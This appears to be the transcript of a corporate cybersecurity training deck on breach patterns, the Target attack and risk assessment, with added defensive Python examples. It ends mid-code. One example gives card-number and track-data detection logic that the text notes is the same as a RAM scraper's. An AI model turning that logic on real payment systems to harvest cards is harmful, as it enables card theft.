COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these five attack patterns:
- Web app attacks
- POS intrusions
- Privilege misuse
- Cyber-espionage
- Crimeware
• 63% of all breaches are attributable to the top two alone
Common attack patterns account for the vast majority of documented breaches
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites carry real business functionality (ordering, payments, account management), which raises the impact of a successful breach
• Recycled or unchanged default passwords, and credentials stolen elsewhere and reused, undermine an organization's other security efforts
• Breaching a web application can open the gates to internal applications, databases and source code, because the application server usually holds trusted connections behind the firewall
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target the systems that capture customer payment card data during legitimate transactions
• Attacks can exploit POS software or hardware, most often by installing malware that reads card data from the terminal's memory before it is encrypted
• Attackers commonly compromise POS system vendors and their remote-access accounts as the way into a customer's POS environment
• Retail and accommodation (hotel and restaurant) businesses are experiencing POS attacks on a massive scale
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act, maliciously or not, in a way that causes a breach: using access they legitimately hold for a purpose it was never granted for
• Most actors are outside executive management and leadership roles; ordinary end users and administrators account for the bulk of cases
• While financial gain still motivates most actors, espionage (taking data to a competitor or a new employer) has become an increasingly common motivation
• Most of these breaches take months or longer to discover, because the activity looks like normal use of a valid account
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties, often state-affiliated groups and sometimes organized crime, infiltrating an organization's systems to steal information rather than money
• Attacks commonly begin with phishing and/or the exploitation of software vulnerabilities (in browsers, browser plug-ins or the organization's own websites) to plant a backdoor that gives the attacker persistent remote access
• Over 90% of cyber-espionage breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware incident whose direct aim is financial gain and that does not fit a more specific pattern
• Ransomware, keyloggers and the use of backdoors are the most common forms of crimeware
• Crimeware is typically introduced through:
- Email attachments
- Drive-by downloads from a visited website (often a compromised legitimate site or a malicious advertisement)
- Email links
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach (2013) - 70 million customers' PII records and 40 million credit and debit card numbers stolen
• Sony Pictures Attack (2014) - destructive malware wiped more than half of the company's servers and PCs; the attackers also released four unreleased films and over 45,000 Social Security numbers
• Yahoo Data Breaches (2013 and 2014) - an August 2013 breach exposed the PII of 1 billion users (revised to all 3 billion accounts in October 2017), and a separate 2014 breach affected 500 million users; both were only disclosed in 2016
• Prepaid Card / ATM Cash-Out Scheme (2013) - $45 million stolen worldwide by raising the withdrawal limits on hacked prepaid card accounts and cashing out at ATMs in coordinated waves
• Bangladesh Bank (February 2016) - $81 million stolen through fraudulent SWIFT payment instructions sent from the bank's own compromised systems
COMPLEXITY BEHIND THE TARGET ATTACK
• The attackers first compromised a third-party vendor (an HVAC contractor) with malware delivered by a phishing campaign
• They used the HVAC vendor's stolen credentials to log in to Target's vendor web portal, which was used for submitting electronic invoices
• They exploited a vulnerability in the invoice submission process to run their own code and gain a foothold on Target's internal network
• They performed reconnaissance of the environment and obtained domain administrator access
• They then worked their way through the network, scanning from each compromised server to find which other servers they could reach from their current position, and worked around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK
• They reached a server hosting a SQL database and downloaded 70 million customer PII records
• They then gained access to the POS environment, which should have been walled off from the rest of the network by segmentation
• They went to the darknet to find someone with knowledge of the POS system and of how to inject code into the POS application
• They installed malware on POS systems that scanned memory for card data in the brief moment it sits unencrypted in the terminal, and saved it off
• They copied the collected card data to an internal server that could reach the internet by FTP and sent the files to themselves
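What "scanned memory and saved off credit card information" means in practice, as an added example that is not from the original presentation and is not the malware used against Target. The same two tests, a pattern match for magnetic-stripe track data or a bare card number and the Luhn check digit, are what a RAM scraper uses to find cards and what a defender uses to confirm that card data is not sitting in clear text in a memory dump, a log file or a crash report. It is Python over a constructed memory snapshot; the card numbers are the payment industry's published test numbers.

```python
import re

# Track 2 data as encoded on a card's magnetic stripe: start sentinel ';', the
# primary account number (PAN), '=' separator, expiry as YYMM, a three-digit
# service code, discretionary data, end sentinel '?'.
TRACK2_RE = re.compile(rb";?(\d{13,19})=(\d{4})(\d{3})\d*\??")
# A bare PAN: 13 to 19 digits not adjacent to other digits.
PAN_RE = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test; every real PAN passes it, so it filters out order
    numbers, timestamps and other digit runs that merely look like card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Keep the first six and last four digits, which is what PCI DSS allows to be displayed."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_card_data(buffer: bytes) -> list:
    """Scan a byte buffer (a process memory dump, a log file, a disk image) for
    card data. Returns one record per hit, with the PAN masked."""
    hits = []
    covered = []  # byte ranges already reported as track data
    for m in TRACK2_RE.finditer(buffer):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"type": "track2", "pan": mask(pan), "expiry": m.group(2).decode()})
            covered.append((m.start(), m.end()))
    for m in PAN_RE.finditer(buffer):
        if any(s <= m.start() < e for s, e in covered):
            continue  # this digit run is part of track data reported above
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"type": "pan", "pan": mask(pan)})
    return hits


# Constructed memory snapshot (not real data). The card numbers are the
# industry's published test numbers; the order number fails the Luhn check.
SAMPLE_MEMORY = (
    b"POS-TERMINAL-07\x00\x00ORDER=1234567890123456\x00"
    b";4111111111111111=25121010000000000?\x00"
    b"settlement ref 5555555555554444 amount 42.17\x00"
    b"\x00\xffpadding\x00"
)

if __name__ == "__main__":
    for hit in find_card_data(SAMPLE_MEMORY):
        print(hit)
```

The defensive use is the important one: running a scan like this against memory captured from a POS terminal during a transaction, or against application logs, is how an assessor verifies that point-to-point encryption is actually in effect and that the "brief moment" of clear-text card data is as brief as the vendor claims.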
RANSOMWARE - ANATOMY OF AN ATTACK
(This slide is a diagram of the stages of a ransomware attack; the image is not reproduced in this transcript)
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to judge what is enough, or how to recover when their best efforts still end in a breach. The main reasons companies struggle are:
• Expansion of the attack surface (cloud services, mobile devices, vendor connections, Internet of Things devices)
• Continued innovation in technology, which outpaces the controls built for the previous generation
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security processes and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN DEPTH
Defense in depth rests on three legs: people, technology and processes. A weakness in any one of them undermines the other two
THE PEOPLE CHALLENGE - Humans remain one of the weakest links in the security chain. Ensure you have a strong, ongoing security awareness training program
THE TECHNOLOGY CHALLENGE - The increasing sophistication and rate of attacks mean that constant upkeep (patching, monitoring) and tracking of technology changes are essential
THE PROCESS CHALLENGE - Ensure best-practice processes and the associated management frameworks are in place. Regular audits and reviews are important
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where the high-risk assets exist
• Risk assessments should be performed annually and whenever significant changes to the environment occur
• Stinnett uses Microsoft's STRIDE threat model (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege) to semi-quantitatively measure cybersecurity risks, that is, to identify, estimate and prioritize information security risks
The assessment proceeds through five steps:
1. Identification of assets
2. Asset locations
3. Classification of assets
4. Threat modeling
5. Calculated risk results
CYBERSECURITY RISK ASSESSMENT
The key to an effective cybersecurity program is to understand the company's information assets
• What value do the assets have?
- Credit card data
- Employee or customer records
- Bank accounts
- Intellectual property
- Trade secrets
- Insider knowledge
• Who would want the data?
• Where is the data located?
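The five assessment steps and the asset questions above, carried through as an added example that is not from the original presentation and is not Stinnett's scoring method. It is Python: each asset is recorded with its location, a classification reflecting the value of its data and the controls already in place, every STRIDE category is scored for likelihood and impact, and the products are ranked into a risk register. The assets, the scoring rules and the control strengths are assumptions for the illustration; the point is the shape of a semi-quantitative model, not the particular numbers.

```python
from dataclasses import dataclass, field

STRIDE = (
    "Spoofing",
    "Tampering",
    "Repudiation",
    "Information disclosure",
    "Denial of service",
    "Elevation of privilege",
)


@dataclass
class Asset:
    name: str
    location: str
    classification: int          # 1 = public ... 5 = card data / trade secrets
    internet_facing: bool
    # STRIDE category -> strength (0..3) of the controls already in place
    controls: dict = field(default_factory=dict)


def likelihood(asset: Asset, threat: str) -> int:
    """1 (rare) to 4 (expected). Exposure raises it, existing controls lower it."""
    score = 3 if asset.internet_facing else 2
    if asset.internet_facing and threat in ("Spoofing", "Denial of service"):
        score += 1  # anyone on the internet can try to log in or flood it
    return max(1, score - asset.controls.get(threat, 0))


def impact(asset: Asset, threat: str) -> int:
    """1 to 5, driven by the asset's classification; outages and deniability
    hurt less than losing or corrupting the data itself."""
    if threat == "Denial of service":
        return max(1, asset.classification - 1)
    if threat == "Repudiation":
        return max(1, asset.classification - 2)
    return asset.classification


def risk_register(assets) -> list:
    """Score every asset against every STRIDE category and rank the results."""
    rows = []
    for a in assets:
        for t in STRIDE:
            lik, imp = likelihood(a, t), impact(a, t)
            rows.append({"asset": a.name, "location": a.location, "threat": t,
                         "likelihood": lik, "impact": imp, "risk": lik * imp})
    rows.sort(key=lambda r: (-r["risk"], r["asset"], r["threat"]))
    return rows


# Constructed inventory for the illustration (assets, locations and control
# strengths are assumptions, not data from the presentation).
SAMPLE_ASSETS = [
    Asset("Cardholder database", "POS segment", 5, False, {"Information disclosure": 1}),
    Asset("Customer web portal", "DMZ", 3, True, {"Spoofing": 2, "Tampering": 2}),
    Asset("Vendor invoice portal", "DMZ", 2, True),
]

if __name__ == "__main__":
    for row in risk_register(SAMPLE_ASSETS)[:6]:
        print(f'{row["risk"]:2d}  {row["asset"]:22s} {row["threat"]:24s} ({row["location"]})')
```

With these inputs the register puts tampering, spoofing and elevation of privilege against the cardholder database at the top even though it is not internet-facing, because the value of the data dominates; the exposed vendor portal ranks lower on impact but high on likelihood, which is exactly the combination the Target walkthrough turned into an entry point.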
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design against a commonly accepted framework (for example the NIST Cybersecurity Framework or the CIS Critical Security Controls)
• Identify control gaps and establish a baseline of cybersecurity maturity for the organization, against which later progress can be measured
CYBERSECURITY FAILURES AND FIXES
Patch Management - A patch management process is a company's strategy for ensuring that its IT devices are updated (patched) to the latest software release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the devices on their network and therefore cannot assess whether their patch management process actually covers everything
User and Administrator Access - Companies fail to adequately review user access levels to ensure that the principle of least privilege (each person and account gets only the access its job requires) is applied as far as possible. Within the IT department the failure of least privilege results in many individuals and IDs holding, or knowing the credentials for, high-level functions in the environment, so that one phished administrator or one disgruntled employee can do enormous damage
User Cybersecurity Training and Awareness - Companies often fail to provide even basic end-user training on cybersecurity. Often the uneducated or untrained end user is the attacker's first entry point into the company
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk with respect to missing patches
• Focus on higher-risk areas first: internet-facing devices, and software with a history of exploited vulnerabilities (Adobe products, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password parameters are adequate (length, character rules and change interval); note that current guidance in NIST SP 800-63B favors long passwords screened against lists of known-breached passwords over forced periodic changes and composition rules
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and that backups are segregated (offline, or reachable only with separate credentials) so that ransomware running as a user or administrator cannot encrypt them too
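The two inventory fixes above (devices first, then patch risk), as an added example that is not from the original presentation. It is Python over a constructed asset inventory and a constructed network-discovery result: the first check finds devices that answered on the network but are absent from the inventory, which no patch process will ever reach; the second ranks the known devices by how long they have gone unpatched, weighting internet-facing ones because those are the systems attackers can reach directly. Hostnames, addresses, dates and the weighting are assumptions for the illustration.

```python
import csv
import io
from datetime import date

# Constructed inventory and network-discovery output (not real data). The
# inventory is what the company believes it owns; the scan is what actually
# answered on the network.
INVENTORY_CSV = """hostname,ip,role,internet_facing,os,last_patched
web01,203.0.113.10,web server,yes,Windows Server 2012 R2,2016-08-01
fs01,10.0.0.5,file server,no,Windows Server 2008,2015-03-15
hr-laptop-12,10.0.2.40,workstation,no,Windows 10,2017-10-10
"""

DISCOVERY_CSV = """ip,hostname
203.0.113.10,web01
10.0.0.5,fs01
10.0.2.40,hr-laptop-12
10.0.3.77,unknown-device
"""

AS_OF = date(2017, 10, 27)  # the presentation date, used as "today" for the illustration


def load_rows(text: str) -> list:
    return list(csv.DictReader(io.StringIO(text)))


def unknown_devices(inventory: list, scan: list) -> list:
    """Devices seen on the network that the inventory does not know about.
    Nothing in the patch process will ever reach these, so they come first."""
    known = {row["ip"] for row in inventory}
    return [row for row in scan if row["ip"] not in known]


def patch_backlog(inventory: list, today: date, stale_days: int = 365) -> list:
    """Rank devices by how overdue they are, weighting internet-facing ones.

    The one-year threshold mirrors the slide's own statistic: the vulnerabilities
    that get exploited are overwhelmingly ones whose patch has been out for more
    than a year.
    """
    rows = []
    for row in inventory:
        age = (today - date.fromisoformat(row["last_patched"])).days
        weight = 3 if row["internet_facing"].strip().lower() == "yes" else 1
        rows.append({
            "hostname": row["hostname"],
            "days_since_patch": age,
            "stale": age > stale_days,
            "priority": age * weight,
        })
    rows.sort(key=lambda r: -r["priority"])
    return rows


if __name__ == "__main__":
    inventory, scan = load_rows(INVENTORY_CSV), load_rows(DISCOVERY_CSV)
    print("not in inventory:", unknown_devices(inventory, scan))
    for row in patch_backlog(inventory, AS_OF):
        print(row)
```

The file server has gone longer without a patch, but the web server ranks first because it is exposed to the internet; the laptop patched two weeks ago is not stale at all. The unknown device at 10.0.3.77 is the finding that matters most, since it is invisible to every other control on the list.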
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888-808-1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number 918-728-3300
ContactUs@Stinnett-Associates.com
LIST OF RECENT HEADLINES
11
WHY DO WE CARE
12
Security compromises are a persistent business risk
• The US Department of Commerce estimates intellectual property theft costs US companies $250 billion annually
• In 2015, 38% more security incidents were detected than in 2014
• 70% of cyber attacks and data breaches go undetected
• 69% of organizations learn of their breach from an outside entity such as law enforcement, customers or suppliers
• Data breaches cost companies an average of $154 per compromised record
• The cyberinsurance market will reach $7.5 billion in annual sales by 2020, up from $2.5 billion in 2016
• Cyber crime costs are estimated to reach $2 trillion by 2019
• 20% of small and mid-size businesses have been cyber crime targets
Sources: PwC, Global State of Information Security Survey 2016; US Dept. of Commerce, Stolen Intellectual Property Harms American Businesses, Says Acting Deputy Secretary Blank (2012); IBM and Ponemon, 2015 Cost of Data Breach Study: Global Analysis
FINANCIAL GAIN STILL #1 REASON
13
Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2015
Espionage and other factors combined still make up less than 25%
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers
• Ransomware payments estimated at over $1 billion in 2016
• 70% of all ransomware was paid
• 20% paid over $20,000
Source: Verizon Data Breach Investigations Report 2016
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII data
• Insider trading information
• Using the compromised environment for other attacks or for rent
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
The types of exploits used are changing
Source: Verizon Data Breach Investigations Report 2016
CYBERSECURITY DEFINED
The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access.
Cybersecurity is usually considered a subset of Information Security but can require the consideration of:
• Application Security
• Operating System and Network Security
• Usage of specific Intrusion Detection and Prevention software and tools
• User Training and Education
• Disaster Recovery and Business Continuity considerations
• Really anything that helps prevent, detect or recover from a cyberattack
16
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public Web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
17
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices) that, after being infected with malware, are each running one or more bots. Botnets can be used to perform distributed denial of service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL injection, the attacker uses SQL language to obtain information back from the website that was unintended. In cross-site scripting, the attacker injects code that only impacts other users of the website.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
23
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing for data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
24
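What such an insert looks like in practice, as an added example that is not part of the original deck: a gateway-side function that tags the subject and prepends a banner whenever the sender's domain is not the organization's own. The internal domain, the tag text, the banner wording and the two sample messages are assumptions constructed for the example.

```python
"""Added example (not code from the Stinnett deck): the external-email labeling
the slide describes, as a function a mail gateway hook could apply to each
inbound message.

Assumptions: the organization's own domain, the "[EXTERNAL]" subject tag and
the banner wording are constructed for the example; messages are handled as
standard-library email.message.EmailMessage objects.
"""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from email.utils import parseaddr

INTERNAL_DOMAINS = {"example.com"}            # assumption: our own domains
TAG = "[EXTERNAL]"
BANNER = ("CAUTION: This email originated from outside the organization.\n"
          "Do not click links or open attachments unless you recognize the\n"
          "sender and know the content is safe.\n\n")


def is_external(msg: EmailMessage) -> bool:
    """True unless the From: address is in one of our domains (or a sub-domain).

    This only reads the header the gateway handed over; a forged From: is the
    job of SPF/DKIM/DMARC checks earlier in the pipeline, not of this label.
    """
    _, addr = parseaddr(str(msg.get("From", "")))
    domain = addr.rpartition("@")[2].lower()
    if not domain:
        return True    # unparsable sender: label it, never trust it
    return not any(domain == d or domain.endswith("." + d)
                   for d in INTERNAL_DOMAINS)


def label_external(msg: EmailMessage) -> EmailMessage:
    """Prefix the subject with TAG and the plain-text body with BANNER.

    Safe to run twice: a message that is already labeled is left unchanged.
    """
    if not is_external(msg):
        return msg
    subject = str(msg.get("Subject", ""))
    if not subject.startswith(TAG):
        if "Subject" in msg:
            msg.replace_header("Subject", f"{TAG} {subject}".strip())
        else:
            msg["Subject"] = TAG
    body = msg.get_body(preferencelist=("plain",))
    if body is not None:
        text = body.get_content()
        if not text.startswith(BANNER):
            body.set_content(BANNER + text)
    return msg


def label_raw(raw: bytes) -> EmailMessage:
    """Parse a raw RFC 5322 message and label it."""
    return label_external(BytesParser(policy=policy.default).parsebytes(raw))


# Constructed sample messages: one styled like the "CEO email to Treasurer"
# case on the slide (lookalike domain), and one genuine internal message.
RAW_EXTERNAL = b"""From: "Chief Executive" <ceo@example-corp-mail.net>
To: treasurer@example.com
Subject: Urgent wire transfer
Content-Type: text/plain; charset="utf-8"

Please process the attached wire request before noon today.
"""

RAW_INTERNAL = b"""From: CEO <ceo@example.com>
To: treasurer@example.com
Subject: Board deck
Content-Type: text/plain; charset="utf-8"

Draft attached for your review.
"""

if __name__ == "__main__":
    for raw in (RAW_EXTERNAL, RAW_INTERNAL):
        m = label_raw(raw)
        print(m["Subject"], "|", m.get_content().splitlines()[0])
```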
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
25
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
26
• The use of BITCOINS is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these 5 attack patterns:
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63% of all breaches are attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
28
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems capturing customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
29
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
30
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
31
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and the use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
- Email attachment
- Cross-site scripting from a visited website
- Email link
32
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 million stolen
33
COMPLEXITY BEHIND THE TARGET ATTACK
34
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through the use of malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices
• Injected code into a vulnerability in the electronic submission process to gain further access to Target's internal network
• Reconnoitered the environment and obtained domain administrator access
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location; worked around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK
35
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off)
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
36
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons for companies' struggles are:
37
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
39
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE threat modeling to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets
40
• What Value Do the Assets Have?
- Credit Card Data
- Employee or Customer Records
- Bank Accounts
- Intellectual Property
- Trade Secrets
- Insider Knowledge
• Who Would Want the Data?
• Data Location
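The five-step flow on the previous slide (identify assets, locate them, classify them, STRIDE threat modeling, calculated risk results) and the asset questions above, carried through in code as an added example that is not Stinnett's method or tooling. The 1-5 likelihood and impact scales, the per-location likelihood scores, the rating bands and the asset records are assumptions constructed for the example.

```python
"""Added example, not Stinnett's tooling: a small STRIDE-based risk register
built from a constructed asset inventory, following the deck's five steps.

Assumptions: the 1-5 likelihood and impact scales, the per-location likelihood
scores, the rating bands and the asset records below are invented here; the
deck only states that STRIDE is applied semi-qualitatively.
"""
from dataclasses import dataclass

# Microsoft STRIDE threat categories.
STRIDE = ("Spoofing", "Tampering", "Repudiation", "Information disclosure",
          "Denial of service", "Elevation of privilege")


@dataclass(frozen=True)
class Asset:
    name: str              # step 1: identification
    location: str          # step 2: where the data lives
    classification: str    # step 3: confidential / internal / public
    wanted_by: tuple       # who would want the data
    impact: int            # 1-5, what the asset is worth to the business


# Step 4: likelihood (1-5) of each STRIDE threat succeeding against a location,
# given the controls observed there. Constructed scores for the example.
LIKELIHOOD_BY_LOCATION = {
    "internet-facing web app": dict(zip(STRIDE, (4, 3, 2, 4, 4, 3))),
    "internal database":       dict(zip(STRIDE, (2, 2, 2, 3, 1, 3))),
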